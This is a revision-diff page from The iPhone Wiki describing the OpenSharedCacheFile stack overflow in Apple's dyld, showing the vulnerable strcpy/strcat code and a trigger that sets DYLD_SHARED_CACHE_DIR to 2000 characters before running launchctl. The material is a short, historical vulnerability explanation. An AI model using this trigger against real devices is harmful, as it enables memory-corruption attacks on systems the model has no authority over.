|
The iPhone Wiki is no longer updated. Visit this article on The Apple Wiki for current information. |
Difference between revisions of "OpenSharedCacheFile"
(Created page with "The OpenSharedCacheFile bug was found by i0n1c, what this bug is just a simple stack overflow == Opensharedcachefile() function == int openSharedCacheFile() { char path[1024]...") |
|||
| Line 1: | Line 1: | ||
The OpenSharedCacheFile bug was found by i0n1c, what this bug is just a simple stack overflow |
The OpenSharedCacheFile bug was found by i0n1c, what this bug is just a simple stack overflow |
||
== Opensharedcachefile() function == |
== Opensharedcachefile() function == |
||
| − | int openSharedCacheFile() |
+ | int openSharedCacheFile() |
| − | { |
+ | { |
| − | + | char path[1024]; |
|
| − | + | strcpy(path, sSharedCacheDir); |
|
| − | + | strcat(path, "/"); |
|
| − | + | strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME); |
|
| − | + | return ::open(path, O_RDONLY); |
|
| − | } |
+ | } |
== Triggering the vuln === |
== Triggering the vuln === |
||
To trigger it, run the following |
To trigger it, run the following |
||
| − | DYLD_SHARED_CACHE_DIR = “A” * 2000 \ |
+ | DYLD_SHARED_CACHE_DIR = “A” * 2000 \ |
| − | DYLD_SHARED_REGION = private /bin/launchctl |
+ | DYLD_SHARED_REGION = private /bin/launchctl |
This will overflow the PC register making it a stack overflow. |
This will overflow the PC register making it a stack overflow. |
||
Revision as of 00:54, 23 March 2015
The OpenSharedCacheFile bug was found by i0n1c, what this bug is just a simple stack overflow
int openSharedCacheFile()
{
char path[1024];
strcpy(path, sSharedCacheDir);
strcat(path, "/");
strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME);
return ::open(path, O_RDONLY);
}
Triggering the vuln =
To trigger it, run the following
DYLD_SHARED_CACHE_DIR = “A” * 2000 \ DYLD_SHARED_REGION = private /bin/launchctl
This will overflow the PC register making it a stack overflow.
